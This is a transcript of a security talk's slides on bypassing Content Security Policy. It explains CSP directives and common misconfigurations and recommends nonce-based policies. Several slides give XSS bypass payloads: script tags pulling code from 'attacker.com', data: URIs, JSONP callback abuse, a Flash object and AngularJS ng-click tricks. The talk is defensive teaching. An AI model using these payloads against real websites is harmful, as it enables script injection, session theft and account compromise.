Content Security Policy bypass techniques

Transcript

1. Saturday day live with CSP by Artur Hil

2. What the hell is this? Content Security Policy (CSP) is

   a computer security standard introduced to prevent cross-site scripting (XSS), clickjacking and other code injection attacks resulting from execution of malicious content in the trusted web page context.

3. Yay! We don’t need any input validation now! to prevent

   XSS clickjacking code injection attacks

4. Actually, NO CSP provides a standard method for website owners

   to declare approved origins of content that browsers should be allowed to load on that website

5. Ambitious goals of CSP Mitigate risk Control over resources Control

   over execution Reduce privilege of the application Content is forced into a unique origin Detect exploitation by monitoring violations Collecting violating reports

6. CSP directives… Many for many different problems media-src base-uri font-src

   plugin-types connect-src base-uri style-src script-src child-src report-to navigate-to form-action sandbox script-src-elem prefetch-src worker-src

7. How it’s look like Bad example:

8. How it’s look like Good example:

9. How does it work? example.com <img src=”cat.jpg”> <script src=” //good.com/dog.js”>

   CSP default-src ‘self’; script-src ‘self’ good.com; report-uri /csp_alert_logger; example.com good.com

10. How does it work? example.com <img src=”cat.jpg”> <script src=” //good.com/dog.js”>

    CSP default-src ‘self’; script-src ‘self’ good.com; report-uri /csp_alert_logger; example.com good.com “>’><script src=” //attacker.com/evil.js”> “>’><script>alert(balalaya) </script> example.com/csp_alert_logger source not whitelisted inline scripts are not allowed

11. I deployed CSP! Now I’m in safe! Not exactly, trivial

    mistake #1 script-src ‘self’ ‘unsafe-inline’; object-src ‘none’; ‘unsafe-inline’ in script-src instead of ‘nonce’ Same for ‘default-src’ if script-src directive is not set “>’><script> alert(12345)</script> Bypass:

12. I deployed CSP! Now I’m in safe! Not exactly trivial

    mistake #2 script-src ‘self’ https: data: *; object-src ‘none’; URL shhemes or wildcard in script-src instead of ‘unsafe-dynamic’ Same for URL schemes and wildcard in ‘object-src’ “>’><script src=https://attacker.com/evil.js> </script> Bypass: “>’><script src=data:text/javascript,alert(12345)></script>

13. I deployed CSP! Now I’m in safe! Not exactly trivial

    mistake #3 script-src ‘self’; Look’s secure, but… Missing object-src or default-src directive “>’><object type=”application/x-shockwavw-flash” data=’https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/c harts/assets/charts.swf?allowedDomain=\”})))}catch(e) {alert(12345)}//’><param name=”AllowScriptAccess” value=”always”></object> Bypass:

14. I deployed CSP! Now I’m in safe! Not exactly trivial

    mistake #4 script-src ‘self’; object-src ‘none’; Allow ‘self’ + hosting use-provided content on the name origin Same for object-src or default-src directive “>’><script src=”/user_upload/evil_cat.jpg.js”</script> Bypass:

15. Whitelisting JSONP is a problem script-src ‘self’ https://whitelisted.com; object-src ‘none’;

    JSONP-like endpoint in whitelist “>’><script src=”https://whitelisted.com/jsonp?callback=alert”> Bypass:

16. Whitelisting JSONP is a problem CSP script-src ‘self’ https://whitelisted.com; object-src

    ‘none’; alert(12345);u({...}) x.click({...}) “>’><script src=”https://whitelisted.com /jsonp?callback=alert(12345);u”> “>’><script src=”https://whitelisted.com /jsonp?callback=x.click”> Bypass: Don't whitelist JSONP endpoints!

17. Angular JS library in Whitelist script-src ‘self’ https://whitelisted.com; object-src ‘none’;

    “>’><script src=”https://whitelisted.com/angular.min.js”></script> <div ng-app ng-csp>{{2+2}}</div> “>’><script src=”https://whitelisted.com/angularjs/1.1.3/angular.min.js”></script> <div ng-app ng-csp id=p ng-click=$event.view.alert(4) Bypass: Also works without user interaction - combining with JSONP endpoints or other JS libraries

18. How to make safe CSP https://csp-evaluator.withgoogle.com/

19. How to make safe CSP https://cspvalidator.org

20. Best way to make CSP safe script-src ‘nonce-r4nd0m123’ object-src ‘none’;

    Benefits: All <script> tags with correct nonce attribute will be executed <script> tags injected via XSS will be blocked because of missing nonce No host/path whitelists! --> NO BYPASSES

21. How does nonce work? example.com <img src=”cat.jpg”> <script nonce=”r4nd0m123” src=”

    //some.site/dog.js”> CSP default-src ‘self’; script-src ‘self’ nonce-r4and0m123; report-uri /csp_alert_logger; example.com good.com “>’><script src=” //attacker.com/evil.js”> “>’><script>alert(balalaya) </script> example.com/csp_alert_logger script without correct nonce

22. How it’s look like Good example:

23. A New way to make CSP script-src ‘nonce-r4nd0m123’ ‘unsafe-dynamic’; object-src

    ‘none’; • nonce-r4nd0m - Allows all scripts to execute if the correct nonce is set. • unsafe-dynamic - Propagates trust and discards whitelists CSP V.3

24. QUESTIONS?